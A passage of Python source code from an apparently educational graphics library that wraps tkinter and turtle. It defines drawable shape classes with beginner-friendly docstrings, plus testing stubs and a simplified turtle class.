self.mouse._update(event) def _on_key_press(self, event): self.keyboard._update(event) # def add_canvas(self, width=None, height=None, background_color=0): # FIXME: Set defaults based on the main canvas. # new_canvas = RoseCanvas(self, background_color='white') # self.widgets.append(new_canvas) # # _root.update() def __serialize_shapes(self): """Returns a list of strings representing the shapes in sorted order.""" return _serialize_shapes(self) class RoseWidget(): """ A Widget is a thing that one can put on a Window, e.g. a Canvas, FortuneTeller, etc. """ def __init__(self, window): self._window = window def get_window(self): return self._window class RoseCanvas(RoseWidget): defaults = {'colors': [None, 'yellow', 'light blue', 'dark grey']} count = 0 """ A RoseCanvas is a RoseWidget (i.e., a thing on a RoseWindow) upon which one can draw shapes and other Drawable things. """ def __init__(self, window, width=200, height=200, background_color=0): super().__init__(window) RoseCanvas.count = RoseCanvas.count + 1 # FIXME: Deal with default background colors. # FIXME: Store background color as a property # so that modifying it changes the tkinter canvas. # Ditto width and height. # if background_color == 0: # index = RoseCanvas.count % len(defaults['colors']) # self.background_color = defaults['colors'][index] # else: # self.background_color = background_color tk_canvas = tkinter.Canvas(window.toplevel, width=width, height=height, background=background_color) self._tkinter_canvas = tk_canvas # FIXME: Automate gridding better. self._tkinter_canvas.grid(padx=5, pady=5) self.shapes = [] def render(self, seconds_to_pause=None): """ Updates all the Shapes attached to this RoseCanvas, then draws all those Shapes. After doing so, pauses the given number of seconds. :type seconds_to_pause: float """ self._update_shapes() self._window.update() if seconds_to_pause: time.sleep(seconds_to_pause) def _renderShape(self, shape, render_NOW=False): """Renders a shape.""" coordinates = shape._get_coordinates_for_drawing() options = shape._get_options_for_drawing() if shape.shape_id_by_canvas[self] is None: shape.shape_id_by_canvas[self] = \ shape._method_for_drawing(self._tkinter_canvas, *coordinates) try: self._tkinter_canvas.coords(shape.shape_id_by_canvas[self], *coordinates) except tkinter.TclError: msg = 'Could not place the shape\n' msg += 'on the given window.\n' msg += 'Did you accidentally close a window\n' msg += 'that later needed to be rendered again?' raise Exception(msg) from None self._tkinter_canvas.itemconfigure(shape.shape_id_by_canvas[self], options) if render_NOW: # redraw NOW self._window.update() def _draw(self, shape): """Queues a shape for being drawn. Does NOT draw it just yet.""" shapeInList = False for listShape in self.shapes: if listShape is shape: shapeInList = True break if not shapeInList: shape.shape_id_by_canvas[self] = None self.shapes.append(shape) def _undraw(self, shape): if shape in self.shapes: for i in range(len(self.shapes)): if self.shapes[i] is shape: self._tkinter_canvas.delete(shape.shape_id_by_canvas[self]) del self.shapes[i] break def _update_shapes(self): for shape in self.shapes: self._renderShape(shape) class Mouse(object): def __init__(self): self.position = None def _update(self, event): self.position = Point(event.x, event.y) class Keyboard(object): def __init__(self): self.key_pressed = None def _update(self, event): pass class __FreezeClass__ (type): """Prevents class variable assignment.""" def __setattr__(self, name, _ignored): # last parameter is the value err = "You tried to set the instance variable '" + name + "'\n" err += " on the CLASS '" + self.__name__ + "'" err += ", which is not an OBJECT.\n" err += " Did you forget the () after the word " err += self.__name__ + ",\n" err += " on the line where you constructed the object?" raise SyntaxError(err) class _Shape(object, metaclass=__FreezeClass__): """ A Shape is a thing that can be drawn on a RoseCanvas (which itself draws on a tkinter Canvas). Its constructor provides the tkinter method to be used to draw this Shape. This abstract type has concrete subclasses that include: Arc, Bitmap, Circle, Ellipse, Image, Line, Path, Polygon, Rectangle, RoundedRectangle, Square, Text and Window. Public data attributes: None. Public methods: attach_to. """ def __init__(self, method_for_drawing): """ Arguments: -- the tkinter method for drawing the Shape. """ self._method_for_drawing = method_for_drawing self.shape_id_by_canvas = {} def __eq__(self, other): """ Two Shape objects are equal (==) if all their attributes are equal to each other. """ # check before we go deleting keys that may or may not exist if(not isinstance(other, self.__class__)): return False self_dict = self.__dict__.copy() other_dict = other.__dict__.copy() del self_dict["shape_id_by_canvas"] del other_dict["shape_id_by_canvas"] return (self_dict == other_dict) def __ne__(self, other): return not self.__eq__(other) def attach_to(self, window_or_canvas): """ 'draws' this Shape. More precisely: Attaches this Shape to the given RoseWindow or RoseCanvas. When that RoseWindow/RoseCanvas is rendered, this shape will appear on that RoseWindow/RoseCanvas. """ if isinstance(window_or_canvas, RoseWindow): window_or_canvas = window_or_canvas.initial_canvas window_or_canvas._draw(self) def detach_from(self, rose_canvas): """ 'undraws' this Shape. More precisely: Detaches this Shape from the given RoseWindow or RoseCanvas. When that RoseWindow/RoseCanvas is rendered, this shape will no longer appear on that RoseWindow/RoseCanvas. """ if type(rose_canvas) == RoseWindow: rose_canvas = rose_canvas.initial_canvas rose_canvas._undraw(self) class _ShapeWithOutline(object): """ A Shape that has an interior (which can be filled with a color) and an outline (which has a color and thickness). This abstract type has concrete subclasses that include: Arc, Circle, Ellipse, Image, Line, Path, Polygon, Rectangle, Square, Text and Window. Public data attributes: fill_color, outline_color, outline_thickness. Public methods: _initialize_options. """ defaults = {'fill_color': None, 'outline_color': 'black', 'outline_thickness': 1} def _initialize_options(self): self.fill_color = _ShapeWithOutline.defaults['fill_color'] self.outline_color = _ShapeWithOutline.defaults['outline_color'] self.outline_thickness = _ShapeWithOutline.defaults[ 'outline_thickness'] def _get_options_for_drawing(self): options = {'fill': self.fill_color, 'outline': self.outline_color, 'width': self.outline_thickness} # If a color is None, that means transparent here: for option in ('fill', 'outline'): if not options[option]: options[option] = '' return options class _ShapeWithThickness(object): """ A Shape that can be (and almost always is) filled with a color and has a thickness but no outline. This abstract type has concrete subclasses that include: Line and Path. Public data attributes: color, thickness. Public methods: _initialize_options. """ defaults = {'color': 'black', 'thickness': 1, 'arrow': None} def _initialize_options(self): self.color = _ShapeWithThickness.defaults['color'] self.thickness = _ShapeWithThickness.defaults['thickness'] self.arrow = _ShapeWithThickness.defaults['arrow'] def _get_options_for_drawing(self): options = {'fill': self.color, 'width': self.thickness, 'arrow': self.arrow} # If a color is None, that means 'black' here: if options['fill'] is None: options['fill'] = 'black' return options class _ShapeWithText(object): """ A Shape that has text and a font for displaying that text. This abstract type has concrete subclasses that include: Text. Public data attributes: font_family, font_size, is_bold, is_italic, is_underline, is_overstrike. Public methods: _initialize_options. """ # FIXME: Add more to the above docstring. defaults = {'font_family': 'helvetica', 'font_size': 14, 'weight': 'normal', 'slant': 'roman', 'underline': 0, 'overstrike': 0, 'justify': tkinter.CENTER, 'text_box_width': None, 'text_color': 'black', 'text': ''} def _initialize_options(self): self.font_family = _ShapeWithText.defaults['font_family'] self.font_size = _ShapeWithText.defaults['font_size'] self.is_bold = _ShapeWithText.defaults['weight'] == 'bold' self.is_italic = _ShapeWithText.defaults['slant'] == 'italic' self.is_underline = _ShapeWithText.defaults['underline'] == 1 self.is_overstrike = _ShapeWithText.defaults['overstrike'] == 1 self.justify = _ShapeWithText.defaults['justify'] self.text_box_width = _ShapeWithText.defaults['text_box_width'] self.text_color = _ShapeWithText.defaults['text_color'] self.text = _ShapeWithText.defaults['text'] def _get_options_for_drawing(self): weight = 'bold' if self.is_bold else 'normal' slant = 'italic' if self.is_italic else 'roman' underline = 1 if self.is_underline else 0 overstrike = 1 if self.is_overstrike else 0 font = tkinter_font.Font(family=self.font_family, size=self.font_size, weight=weight, slant=slant, underline=underline, overstrike=overstrike) options = {'font': font, 'justify': self.justify, 'fill': self.text_color, 'text': self.text} if self.text_box_width: options['width'] = self.text_box_width return options class _ShapeWithCenter(_Shape): """ A Shape that has a center (and for which moving its center moves the entire Shape). Its constructor provides the center of the Shape along with its method for drawing this Shape. This abstract type has concrete subclasses that include: Arc, Bitmap, Circle, Ellipse, Image, Rectangle, RoundedRectangle, Square, Text and Window. Public data attributes: center. Public methods: move_by, move_center_to. """ def __init__(self, center, method_for_drawing): """ Arguments: -- the Point that is the center of the Shape (the Shape stores a CLONE of that Point) -- the tkinter method for drawing the Shape. """ # Clone the center argument, so that if the caller # mutates the argument, it does NOT affect this Shape. super().__init__(method_for_drawing) self.center = center.clone() def move_by(self, dx, dy): """ Moves this _Shape to the right by dx and down by dy. Negative values move it to the left/up instead. Does NOT return a value; instead, it mutates this shape. :type dx: float :type dy: float """ self.center.move_by(dx, dy) def move_center_to(self, x, y): """ Moves this _Shape's center to (x, y), thus translating the entire Shape by however much its center moved. :type x: float :type y: float """ self.center.move_to(x, y) class _RectangularShape(_Shape): """ A _Shape determined by its rectangular bounding box (plus possibly other information). Concrete sub-classes include: rg.Ellipse, rg.Rectangle. Examples: These all assume that the variable shape is a _RectangularShape (e.g. an rg.Ellipse or a rg.Rectangle): The methods in these examples all return rg.Point objects that are copies of a corner/center of the _RectangularShape: ul = shape.get_upper_left_corner() ur = shape.get_upper_right_corner() ll = shape.get_lower_left_corner() lr = shape.get_lower_right_corner() center = shape.get_center() The methods in these examples return a positive number: h = shape.get_height() w = shape.get_width() The method in this example returns an rg.Rectangle that encloses this _RectangularShape: bbox = shape.get_bounding_box() This example moves this _RectangularShape right 100 and up 50: shape.move_by(100, -50) This example does the same thing another way: shape.corner_1 = shape.corner_1 + 100 shape.corner_2 = shape.corner_2 - 50 """ def __init__(self, corner_1, corner_2, method_for_drawing): """ :type corner_1: Point :type corner_2: Point :type method_for_drawing: callable(int, int, int, int) -> int """ super().__init__(method_for_drawing) self.corner_1 = corner_1.clone() self.corner_2 = corner_2.clone() self._update_corners() def __repr__(self): """ Returns a string representation of this shape. """ f_string = '' f_string += '{}: corner_1=({}, {}), corner_2=({}, {}),' f_string += ' fill_color={},' f_string += ' outline_color={}, outline_thickness={}.' return f_string.format(self.__class__.__name__, self.corner_1.x, self.corner_1.y, self.corner_2.x, self.corner_2.y, self.fill_color, self.outline_color, self.outline_thickness) def move_by(self, dx, dy): """ Moves this _Shape to the right by dx and down by dy. Negative values move it to the left/up instead. Does NOT return a value; instead, it mutates this shape. :type dx: float :type dy: float """ self.corner_1.x += dx self.corner_1.y += dy self.corner_2.x += dx self.corner_2.y += dy def clone(self): """ Returns a copy of this _RectangularShape. """ return self.__class__(self.corner_1.clone(), self.corner_2.clone()) def get_upper_left_corner(self): """ Returns a copy of the ** upper-left ** corner of this _RectanglarShape. The returned value is an rg.Point. """ self._update_corners() return self._upper_left_corner def get_lower_left_corner(self): """ Returns a copy of the ** lower-left ** corner of this _RectanglarShape. The returned value is an rg.Point. """ self._update_corners() return self._lower_left_corner def get_upper_right_corner(self): """ Returns a copy of the ** upper-right ** corner of this _RectanglarShape. The returned value is an rg.Point. """ self._update_corners() return self._upper_right_corner def get_lower_right_corner(self): """ Returns a copy of the ** lower-right ** corner of this _RectanglarShape. The returned value is an rg.Point. """ self._update_corners() return self._lower_right_corner def get_center(self): """ Returns a copy of the ** center ** of this _RectanglarShape. The returned value is an rg.Point. """ return Point((self.corner_1.x + self.corner_2.x) / 2, (self.corner_1.y + self.corner_2.y) / 2) def get_height(self): """ Returns the height (i.e., the size in the y-direction) of this _RectangularShape. The returned value is always positive. """ return abs(self.corner_1.y - self.corner_2.y) def get_width(self): """ Returns the width (i.e., the size in the x-direction) of this _RectangularShape. The returned value is always positive. """ return abs(self.corner_1.x - self.corner_2.x) def get_bounding_box(self): """ Returns an rg.Rectangle that encloses this _RectangularShape. """ return Rectangle(self.corner_1, self.corner_2) def _update_corners(self): min_x = min(self.corner_1.x, self.corner_2.x) min_y = min(self.corner_1.y, self.corner_2.y) max_x = max(self.corner_1.x, self.corner_2.x) max_y = max(self.corner_1.y, self.corner_2.y) self._upper_left_corner = Point(min_x, min_y) self._upper_right_corner = Point(max_x, min_y) self._lower_left_corner = Point(min_x, max_y) self._lower_right_corner = Point(max_x, max_y) def _get_coordinates_for_drawing(self): return [self.get_upper_left_corner().x, self.get_upper_left_corner().y, self.get_lower_right_corner().x, self.get_lower_right_corner().y] class Arc(_RectangularShape, _ShapeWithOutline): """ Not yet implemented. """ class Bitmap(_Shape): """ Not yet implemented. """ class Circle(_ShapeWithCenter, _ShapeWithOutline): """ A Shape that is an circle. To construct a Circle, use: - rg.Circle(center, radius) where center is an rg.Point object and radius is a positive integer. For example: - rg.Circle(rg.Point(100, 75), 30) specifies the circle whose center is at (100, 75) and whose radius is 30. Instance variables include: center: An rg.Point that specifies the center of the Circle. radius: The radius of the Circle. fill_color: The Circle is filled with this color. Example: circle.fill_color = 'green' outline_color: The outline of the Circle is this color. Example: circle.outline_color = 'blue' outline_thickness: The thickness (in pixels) of the outline of the Circle. Examples: circle = rg.Circle(rg.Point(100, 75), 30) print(circle.center, circle.radius) circle.fill_color = 'blue' circle.outline_color = 'black' circle.outline_thickness = 5 window = rg.RoseWindow() circle.attach_to(window) circle.move_center_to(300, 200) circle.move_by(-50, 60) # Another way to move the Circle: x = circle.center.x y = circle.center.y circle.center = rg.Point(x - 50, y + 60) """ def __init__(self, center, radius): """ :type center: rg.Point :type radius: int """ # The following sets instance variable # self.center # to a clone (copy) of the given rg.Point. super().__init__(center, tkinter.Canvas.create_oval) # The following sets default values for: # self.fill_color # self.outline_color # self.outline_thickness super()._initialize_options() # The radius is also stored in an instance variable: self.radius = radius def __repr__(self): """ Returns a string representation of this Circle. """ f_string = '' f_string += 'Circle: center=({}, {}), radius={}, fill_color={}, ' f_string += 'outline_color={}, outline_thickness={}.' return f_string.format(self.center.x, self.center.y, self.radius, self.fill_color, self.outline_color, self.outline_thickness) def clone(self): """ Returns a copy of this Circle. """ return Circle(self.center, self.radius) def get_bounding_box(self): """ Returns an rg.Rectangle that encloses this Circle. """ c1 = Point(self.center.x - self.radius, self.center.y - self.radius) c2 = Point(self.center.x + self.radius, self.center.y + self.radius) return Rectangle(c1, c2) def _get_coordinates_for_drawing(self): return self.get_bounding_box()._get_coordinates_for_drawing() class Ellipse(_RectangularShape, _ShapeWithOutline): """ A Shape that is an ellipse (aka oval). To construct an Ellipse, use: - rg.Ellipse(corner1, corner2) where corner1 and corner2 are rg.Point objects that specify opposite corners of the imaginery rectangle that encloses the Ellipse. For example: - rg.Ellipse(rg.Point(100, 50), - rg.Point(300, 200)) specifies the ellipse whose imaginery rectangle that encloses the ellipse: - has upper-left corner (100, 50) and - lower-right corner(300, 200). Another example: - rg.Ellipse(rg.Point(300, 50), - rg.Point(100, 200)) specifies the same ellipse. Any two opposite corners can be used. Instance variables include: corner_1: An rg.Point that specifies one corner of the imaginery rectangle that encloses the Ellipse. corner_2: An rg.Point that specifies an opposite corner of the imaginery rectangle that encloses the Ellipse. fill_color: The Ellipse is filled with this color. Example: ellipse.fill_color = 'green' outline_color: The outline of the Ellipse is this color. Example: ellipse.outline_color = 'blue' outline_thickness: The thickness (in pixels) of the outline of the Ellipse. Examples: p1 = rg.Point(100, 50) p2 = rg.Point(300, 200) ellipse = rg.Rectangle(p1, p2) print(ellipse.corner_1, ellipse.corner_2) ellipse.fill_color = 'blue' ellipse.outline_color = 'black' ellipse.outline_thickness = 5 window = rg.RoseWindow() ellipse.attach_to(window) ellipse.move_to(300, 200) ellipse.move_by(-50, 60) # Another way to move the Ellipse: ellipse.corner_1 = rect.corner_1 - 50 ellipse.corner_2 = rect.corner_2 + 60 # To get rg.Points for the corners/center: ul = ellipse.get_upper_left_corner() ur = ellipse.get_upper_right_corner() ll = ellipse.get_lower_left_corner() lr = ellipse.get_lower_right_corner() center = ellipse.get_center() # To get the width/height (always positive): h = ellipse.get_height() w = ellipse.get_width() """ def __init__(self, corner_1, corner_2): """ :type corner_1: rg.Point :type corner_2: rg.Point """ # The following sets instance variables # self.corner_1 # self.corner_2 # to clones (copies) of the given rg.Points. super().__init__(corner_1, corner_2, tkinter.Canvas.create_oval) # The following sets default values for: # self.fill_color # self.outline_color # self.outline_thickness super()._initialize_options() class Line(_Shape, _ShapeWithThickness): """ A Shape that is a line segment. To construct a Line, use: - rg.Line(start, end) where start and end are rg.Point objects that specify the endpoints of the Line. For example: - rg.Line(rg.Point(100, 50), - rg.Point(200, 30) specifies the Line that starts at (100, 50) and ends at (200, 30). Another example: - rg.Line(rg.Point(200, 30), - rg.Point(100, 50) specifies the Line that is the same as the previous example except that the start and end points are reversed. This is important if the Line's "arrow" type is not None. Instance variables include: start: The rg.Point that is one end of the Line. end: The rg.Point that is the other end of the Line. color: The Line is drawn with this color. thickness: The thickness (in pixels) of the Line. arrow: Specifies whether or not the Line is drawn as an arrow. Possible values are: - None draw the Line without arrow-heads - 'first' draw an arrow-head at the start - 'last' draw an arrow-head at the end - 'both' draw an arrow-head at both For example, if my_line is a Line, then - my_line.arrow = 'last' makes the Line be drawn as an arrow from its start point to its end point. Examples: start = rg.Point(100, 50) end = rg.Point(200, 30) line = rg.Line(start, end) line.color = 'blue' line.thickness = 3 line.arrow = 'both' # A double-sided arrow line.arrow = None # Just a line (no arrow) line.arrow = 'first' # Arrow from end to start line.arrow = 'last' # Arrow from start to end window = rg.RoseWindow() line.attach_to(window) line.move_by(-50, 60) """ def __init__(self, start, end): """ :type start: rg.Point :type end: rg.Point """ super().__init__(tkinter.Canvas.create_line) # The following sets default values for: # self.color # self.thickness # self.arrow super()._initialize_options() # The other instance variables are the endpoints: self.start = start.clone() self.end = end.clone() def __repr__(self): """ Returns a string representation of this Line. """ f_string = '' f_string += 'Line: start=({}, {}), end=({}, {}), color={}, ' f_string += 'thickness={}, arrow={}.' return f_string.format(self.start.x, self.start.y, self.end.x, self.end.y, self.color, self.thickness, self.arrow) def clone(self): """ Returns a copy of this Line. """ return Line(self.start, self.end) def move_by(self, dx, dy): """ Moves both endpoints of this Line (and hence the entire Line as well) to the right by dx and down by dy. Negative values move it to the left/up instead. Does NOT return a value; instead, it mutates this Line. :type dx: float :type dy: float """ self.start.move_by(dx, dy) self.end.move_by(dx, dy) def get_midpoint(self): """ Returns an rg.Point at the midpoint (center) of this Line. """ return Point((self.start.x + self.end.x) / 2, (self.start.y + self.end.y) / 2) def _get_coordinates_for_drawing(self): return [self.start.x, self.start.y, self.end.x, self.end.y] class Path(_Shape, _ShapeWithThickness): """ Not yet implemented. """ class Point(_Shape, _ShapeWithOutline): """ A Shape that is a point in two-dimensional space. It is drawn as a small circle (dot). To construct a Point, use: - rg.Point(x, y) where x and y are the Point's coordinates. For example: - rg.Point(100, 50) specifies the point whose x value is 100 and whose y value is 50. Instance variables include the following: x: The x-coordinate of the Point. y: The y-coordinate of the Point. fill_color: The Point is filled with this color. Note that a Point is drawn as a small, filled circle, which is why it has a fill_color, etc. Example: p.fill_color = 'green' outline_color: The outline of the Point is this color. Example: p.outline_color = 'blue' outline_thickness: The thickness (in pixels) of the outline of the Point. Examples: p = rg.Point(100, 50) print(p.x, p.y) window = rg.RoseWindow() p.attach_to(window) p.move_to(300, 200) p.move_by(-50, 60) # Another way to move the Point: p.x = p.x - 50 p.y = p.y + 60 p.fill_color = 'blue' p.outline_color = 'black' p.outline_thickness = 1 """ defaults = {'width_for_drawing': 5, 'height_for_drawing': 5, 'fill_color': 'black', 'outline_color': 'black', 'outline_thickness': 1} def __init__(self, x, y): """ :type x: float :type y: float """ super().__init__(tkinter.Canvas.create_oval) self.fill_color = Point.defaults['fill_color'] self.outline_color = Point.defaults['outline_color'] self.outline_thickness = Point.defaults['outline_thickness'] self.x = x self.y = y self.width_for_drawing = Point.defaults['width_for_drawing'] self.height_for_drawing = Point.defaults['height_for_drawing'] def __repr__(self): """ Returns a string representation of this Point. """ return 'Point({:.1f}, {:.1f})'.format(self.x, self.y) def clone(self): """ Returns a copy of this Point. """ return Point(self.x, self.y) def move_by(self, dx, dy): """ Moves this Point to the right by dx and down by dy. Negative values move it to the left/up instead. Does NOT return a value; instead, it mutates this Point. :type dx: float :type dy: float """ self.x = self.x + dx self.y = self.y + dy def move_to(self, x, y): """ Moves this Point to (x, y). Does NOT return a value; instead, it mutates this Point. :type x: float :type y: float """ self.x = x self.y = y def get_bounding_box(self): """ Returns an rg.Rectangle that encloses this Point (viewing it as a dot). """ c1 = Point(self.x - self.width_for_drawing / 2, self.y - self.width_for_drawing / 2) c2 = Point(self.x + self.height_for_drawing / 2, self.y + self.height_for_drawing / 2) return Rectangle(c1, c2) def _get_coordinates_for_drawing(self): return self.get_bounding_box()._get_coordinates_for_drawing() class Polygon(_Shape, _ShapeWithOutline): """ Not yet implemented. """ class Rectangle(_RectangularShape, _ShapeWithOutline): """ A Shape that is a rectangle. To construct a Rectangle, use: - rg.Rectangle(corner1, corner2) where corner1 and corner2 are rg.Point objects that specify opposite corners of the rectangle. For example: - rg.Rectangle(rg.Point(100, 50), - rg.Point(300, 200)) specifies the rectangle: - whose upper-left corner is (100, 50) and - whose lower-right corner is (300, 200). Another example: - rg.Rectangle(rg.Point(300, 50), - rg.Point(100, 200)) specifies the same rectangle. Any two opposite corners can be used. Instance variables include: corner_1: An rg.Point that specifies one corner of the Rectangle. corner_2: An rg.Point that specifies an opposite corner of the Rectangle. fill_color: The Rectangle is filled with this color. Example: rect.fill_color = 'green' outline_color: The outline of the Rectangle is this color. Example: rect.outline_color = 'blue' outline_thickness: The thickness (in pixels) of the outline of the Rectangle. Examples: p1 = rg.Point(100, 50) p2 = rg.Point(300, 200) rect = rg.Rectangle(p1, p2) print(rect.corner_1, rect.corner_2) rect.fill_color = 'blue' rect.outline_color = 'black' rect.outline_thickness = 5 window = rg.RoseWindow() rect.attach_to(window) rect.move_to(300, 200) rect.move_by(-50, 60) # Another way to move the Rectangle: rect.corner_1 = rect.corner_1 - 50 rect.corner_2 = rect.corner_2 + 60 # To get rg.Points for the corners/center: ul = rect.get_upper_left_corner() ur = rect.get_upper_right_corner() ll = rect.get_lower_left_corner() lr = rect.get_lower_right_corner() center = rect.get_center() # To get the width/height (always positive): h = rect.get_height() w = rect.get_width() """ def __init__(self, corner_1, corner_2): """ :type corner_1: rg.Point :type corner_2: rg.Point """ # The following sets instance variables # self.corner_1 # self.corner_2 # to clones (copies) of the given rg.Points. super().__init__(corner_1, corner_2, tkinter.Canvas.create_rectangle) # The following sets default values for: # self.fill_color # self.outline_color # self.outline_thickness super()._initialize_options() def get_bounding_box(self): """ Returns a new rg.Rectangle with the same corners as this one. """ return self.clone() class RoundedRectangle(_RectangularShape, _ShapeWithOutline): """ Not yet implemented. """ class Square(_ShapeWithCenter, _ShapeWithOutline): """ A Shape that is an square. To construct a Square, use: - rg.Square(center, length_of_each_side) where center is an rg.Point object and length_of_each_side is a positive integer. For example: - rg.Square(rg.Point(100, 75), 60) specifies the square whose center is at (100, 75) and whose length of each side is 60. Its corners are at: (70, 35), (70, 105), (130, 35), (130, 105). Instance variables include: center: An rg.Point that specifies the center of the Square. radius: The length of each side of the Square. fill_color: The Square is filled with this color. Example: square.fill_color = 'green' outline_color: The outline of the Square is this color. Example: square.outline_color = 'blue' outline_thickness: The thickness (in pixels) of the outline of the Square. Examples: square = rg.Square(rg.Point(100, 75), 60) print(square.center, square.length_of_each_side) square.fill_color = 'blue' square.outline_color = 'black' square.outline_thickness = 5 window = rg.RoseWindow() square.attach_to(window) square.move_center_to(300, 200) square.move_by(-50, 60) # Another way to move the Square: x = square.center.x y = square.center.y square.center = rg.Point(x - 50, y + 60) """ def __init__(self, center, length_of_each_side): """ :type center: rg.Point :type length_of_each_side: int """ # The following sets instance variable # self.center # to a clone (copy) of the given rg.Point. super().__init__(center, tkinter.Canvas.create_rectangle) # The following sets default values for: # self.fill_color # self.outline_color # self.outline_thickness super()._initialize_options() # The length of each side is also stored in an instance variable self.length_of_each_side = length_of_each_side def __repr__(self): """ Returns a string representation of this Square. """ f_string = '' f_string += 'Square: center=({}, {}), side-lengths={}, ' f_string += 'fill_color={}, outline_color={}, outline_thickness={}.' return f_string.format(self.center.x, self.center.y, self.length_of_each_side, self.fill_color, self.outline_color, self.outline_thickness) def clone(self): """ Returns a copy of this Square. """ return Square(self.center, self.length_of_each_side) def get_bounding_box(self): """ Returns a rg.Rectangle with the same corners as this Square. """ c1 = Point(self.center.x - self.length_of_each_side / 2, self.center.y - self.length_of_each_side / 2) c2 = Point(self.center.x + self.length_of_each_side / 2, self.center.y + self.length_of_each_side / 2) return Rectangle(c1, c2) def _get_coordinates_for_drawing(self): return self.get_bounding_box()._get_coordinates_for_drawing() class Text(_ShapeWithCenter, _ShapeWithText): """ A Shape that has a string of text on it, displayed horizontally. Its constructor specifies the rg.Point at which the text is centered and the string that is to be displayed. Public data attributes: center (an rg.Point), font_size (an integer, 5 to 80 or so are reasonable values), is_bold (True if the text is to be displayed in BOLD, else False), is_italic (True or False), is_underline (True or False), is _overstrike (True or False), text_color (color used to display the text, default is 'black') text (the string to be displayed). Public methods: attach_to, move_by, move_center_to. """ def __init__(self, center, text): """ The first argument must be a rg.Point. The second argument must be a string. When this Text object is rendered on a window, the string (2nd argument) is drawn horizontally on the window, centered at the rg.Point that is the 1st argument. Preconditions: :type center: rg.Point :type text str """ super().__init__(center, tkinter.Canvas.create_text) super()._initialize_options() self.text = text # FIXME: Allow __init__ to set the options. def __repr__(self): return "Text displaying '{}' at position {}".format(self.text, self.center) # FIXME: Have repr include characteristics?? # FIXME: Do a clone? # def clone(self): # return Square(self.center, self.length_of_each_side) # def get_bounding_box(self): # return Rectangle(self.center, # 2 * self.length_of_each_side, # 2 * self.length_of_each_side) # FIXME: Implement bounding_box using the tkinter function for it. def _get_coordinates_for_drawing(self): return [self.center.x, self.center.y] # Mark: Window/RoseWindow naming collision is causing mass confusion. # class Window(_Shape): # """ Not yet implemented. """ # default_options = {} # CONSIDER: Are these right for here? class Button(_Shape): """ Not yet implemented. """ default_options = {} class Entry(_Shape): """ Not yet implemented. """ default_options = {} class Color(object): """ A Color represents a fill or outline color created from custom amounts of red, green, and blue light. The arguments are: - The RED component (0-255), - the GREEN component (0-255), - the BLUE component (0-255). This Color can be passed to RoseGraphics colors such as fill_color and outline_color. """ def __init__(self, red, green=None, blue=None): self.red = red self.green = green self.blue = blue def __repr__(self): return "#{:02x}{:02x}{:02x}".format(self.red, self.green, self.blue) # begin STUB code for testing class _RoseWindowStub(RoseWindow): def __init__(self, width=400, height=300, title='Rose Graphics', color='black', canvas_color=None, make_initial_canvas=True): canvas_color = "white" # FIXME self._is_closed = False self.width = width self.height = height self.initial_canvas = _RoseCanvasStub( self, width, height, canvas_color) def render(self, seconds_to_pause=None): pass def get_next_mouse_click(self): return Point(0, 0) def close_on_mouse_click(self): return None def continue_on_mouse_click(self, message='To continue, click anywhere in this window', x_position=None, y_position=None, close_it=False, erase_it=True): return None def _serialize_shapes(self): """Returns a list of strings representing the shapes in sorted order.""" return _serialize_shapes(self) class _RoseCanvasStub(RoseCanvas): def __init__(self, window, width, height, canvas_color): # super().__init__(window, width, height, canvas_color) # canvases.append(self) self.shapes = [] def _draw(self, shape): # super()._draw(shape) self.shapes.append(shape) def render(self, seconds_to_pause=None): # super().render() # don't pause pass class TurtleWindow(object): def __init__(self): self._screen = turtle.Screen() turtle.Turtle._screen = self._screen def close_on_mouse_click(self): self._screen.exitonclick() # We may need the statement: # turtle.TurtleScreen._RUNNING = True # in case we open a subsequent TurtleWindow during this run. # The turtle library seems not to allow for that possibility # (it uses a CLASS variable _RUNNING where I would have expected # an INSTANCE variable). # The next statement appeared to have a visible effect # (something flashed) but nothing worse. At time time # it is commented-out, since we need only a single TurtleWindow. # turtle.TurtleScreen._RUNNING = True def delay(self, milliseconds=None): self._screen.delay(milliseconds) def tracer(self, n=None, delay=None): self._screen.tracer(n, delay) class ShapesWindow(RoseWindow): pass class SimpleTurtle(object): """ A SimpleTurtle is a Turtle with restricted (simpler) functionality. It can move forward/backward (units are pixels), turn (spin) left/right (units are degrees), and more. To construct a SimpleTurtle, use: rg.SimpleTurtle(shape) where shape is OPTIONAL and can be any of: 'turtle' 'arrow' 'classic' 'square' 'circle' 'triangle' 'blank' Instance variables include: speed: An integer from 1 (slowest) to 10 (fastest) that determines how fast the SimpleTurtle moves. pen: an rg.Pen object (see example below) that determines the color and thickness of the line that the SimpleTurtle draws when moving paint_bucket: an rg.PaintBucket object (see example below) that determines the color with which the SimpleTurtle "fills" shapes indicated by using the begin_fill and end_fill methods. Examples: natacha = rg.SimpleTurtle() natacha.forward(100) boris = rg.SimpleTurtle('turtle') boris.speed = 8 boris.pen = rg.Pen('blue', 5) # blue line 5 pixels thick boris.paint_bucket = rg.PaintBucket('red') # Moves with pen down, then with pen up, then with pen down again: boris.left(90) boris.forward(-300) boris.pen_up() boris.go_to(rg.Point(100, -50) boris.pen_down() boris.backward(75) # Moves with the enclosed space "filled" with the paint_bucket boris.begin_fill() ... movements ... boris.end_fill() """ def __init__(self, shape='classic'): """ What comes in: A turtle.Shape that determines how the Turtle looks. Defaults to a Bitmap of the "classic" Turtle (an arrowhead) from early Turtle Graphics. Side effects: Constructs and stores in self._turtle the "real" Turtle to do all the work on behalf of this SimpleTurtle. This (purposely) restricts what this SimpleTurtle knows and can do. :type shape: str """ self.speed = 1 self.pen = Pen('black', 1) self.paint_bucket = PaintBucket('black') self._turtle = turtle.Turtle(shape) self._update_real_turtle() def forward(self, distance): """ Makes this SimpleTurtle go forward the given distance (in pixels). Example (assuming sally is an rg.SimpleTurtle): sally.forward(200) """ self._update_real_turtle() self._turtle.forward(distance) def backward(self, distance): """ Makes this SimpleTurtle go backward the given distance (in pixels). Example (assuming sally is an rg.SimpleTurtle): sally.backward(200) """ self._update_real_turtle() self._turtle.backward(distance) def left(self, angle): """ Makes this SimpleTurtle turn (i.e. spin) left the given distance (in degrees). Example (assuming sally is an rg.SimpleTurtle): sally.left(45) """ self._update_real_turtle() self._turtle.left(angle) def right(self, angle): """ Makes this SimpleTurtle turn (i.e. spin) right the given distance (in degrees). Example (assuming sally is an rg.SimpleTurtle): sally.right(45) """ self._update_real_turtle() self._turtle.right(angle) def go_to(self, point): """ Makes this SimpleTurtle go to the given rg.Point. (0, 0) is at the center of the window. Example (assuming sally is an rg.SimpleTurtle): sally.go_to(rg.Point(100, -50)) """ self._update_real_turtle() self._turtle.goto(point.x, point.y) def draw_circle(self, radius): """ Makes this 